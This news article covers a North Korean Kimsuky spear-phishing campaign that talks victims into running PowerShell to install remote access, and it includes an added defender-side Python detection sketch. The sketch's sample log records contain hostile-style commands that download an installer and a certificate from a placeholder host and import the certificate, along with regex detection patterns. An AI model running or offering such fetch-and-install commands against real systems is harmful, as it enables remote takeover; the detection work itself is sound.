![russian hackers](https://cdn.technadu.com/wp-content/uploads/2021/02/russian-hackers.jpg)
North Korea-linked cyber espionage group Kimsuky (also known as Emerald Sleet, ARCHIPELAGO, Black Banshee, Thallium, Velvet Chollima, and APT43) has adopted a novel approach to compromising victims, combining social engineering with the abuse of trusted administrative tools such as Microsoft PowerShell.
The attackers pretend to be South Korean government officials, taking the time to build rapport with their targets before launching a spear-phishing campaign. This method, observed since January 2025, represents a significant evolution in the group's operational tradecraft, as detailed by Microsoft's Threat Intelligence team.
The phishing emails typically include a malicious PDF attachment or, in some cases, a link designed to appear legitimate but crafted to manipulate users into compromising their own systems.
Victims are instructed via the phishing email to follow a URL that outlines steps to "register" their Windows system. These steps direct targets to launch PowerShell as an administrator and manually copy and execute a provided code snippet in the terminal.
Once executed, this malicious code downloads and installs a browser-based remote desktop application and a certificate file with a hardcoded PIN from the attackers' remote server. The device is then registered using the downloaded certificate and PIN.
This enables the threat actor to access the infected system remotely and initiate data exfiltration.
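As an added defender-side example (not code from the article or from Microsoft's report), the following Python sketch scans constructed PowerShell script-block log records for the sequence described above: an elevated session that downloads files and then imports a certificate. The command patterns, host names and file names are assumptions for illustration, not the group's real indicators.

```python
import re
from collections import defaultdict
from datetime import datetime

# Generic indicator patterns (assumptions, not the actor's actual commands):
# a web download and a certificate import seen in the same elevated session.
DOWNLOAD = re.compile(r"Invoke-WebRequest|\biwr\b|Start-BitsTransfer|DownloadFile|"
                      r"DownloadString|certutil.*-urlcache", re.I)
CERT_INSTALL = re.compile(r"Import-PfxCertificate|Import-Certificate|"
                          r"certutil.*-(add|import)store|X509Store", re.I)

# Constructed sample records modelled loosely on PowerShell script-block logging
# (Event ID 4104): (timestamp, process id, ran elevated, logged script text).
SAMPLE_EVENTS = [
    ("2025-02-10T09:12:01", 4120, True, "Invoke-WebRequest -Uri https://placeholder.invalid/rd.msi -OutFile $env:TEMP\\rd.msi"),
    ("2025-02-10T09:12:08", 4120, True, "Invoke-WebRequest -Uri https://placeholder.invalid/dev.pfx -OutFile $env:TEMP\\dev.pfx"),
    ("2025-02-10T09:12:15", 4120, True, "Import-PfxCertificate -FilePath $env:TEMP\\dev.pfx "
                                        "-CertStoreLocation Cert:\\LocalMachine\\My"),
    ("2025-02-10T10:01:00", 6100, True, "Invoke-WebRequest -Uri https://updates.example.com/x.zip -OutFile C:\\x.zip"),
]


def tag(text):
    """Return the set of indicator tags one script-block text matches."""
    tags = set()
    if DOWNLOAD.search(text):
        tags.add("download")
    if CERT_INSTALL.search(text):
        tags.add("cert_install")
    return tags


def find_suspicious_sessions(events, window_seconds=900):
    """Flag elevated sessions where a download precedes a certificate import
    within window_seconds. Returns [(pid, download_time, cert_time)]."""
    by_pid = defaultdict(list)
    for ts, pid, elevated, text in events:
        if elevated:  # the lure specifically asks for an administrator shell
            by_pid[pid].append((datetime.fromisoformat(ts), text))
    findings = []
    for pid, evs in by_pid.items():
        evs.sort()
        first_download = None
        for t, text in evs:
            tags = tag(text)
            if "download" in tags and first_download is None:
                first_download = t
            if "cert_install" in tags and first_download is not None \
                    and (t - first_download).total_seconds() <= window_seconds:
                findings.append((pid, first_download.isoformat(), t.isoformat()))
                break  # one finding per session is enough for triage
    return findings
```

The download-only session (pid 6100) is deliberately not flagged; the correlation with a subsequent certificate import is what separates this pattern from routine admin activity.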
Another North Korea-linked group previously deployed a similar method in the "Contagious Interview" campaign targeting macOS users in December 2024, tricking users into copying and running malicious commands via Apple's Terminal app under the guise of addressing supposed camera and microphone access issues.
Recent U.S. Department of Justice (DoJ) action uncovered a new North Korean scheme in which an American woman helped North Korean IT workers secure remote jobs at over 300 U.S. companies and operated a "laptop farm" to simulate North Korean workers being in the U.S. Over 70 identities were stolen, and companies experienced data breaches and theft of proprietary information.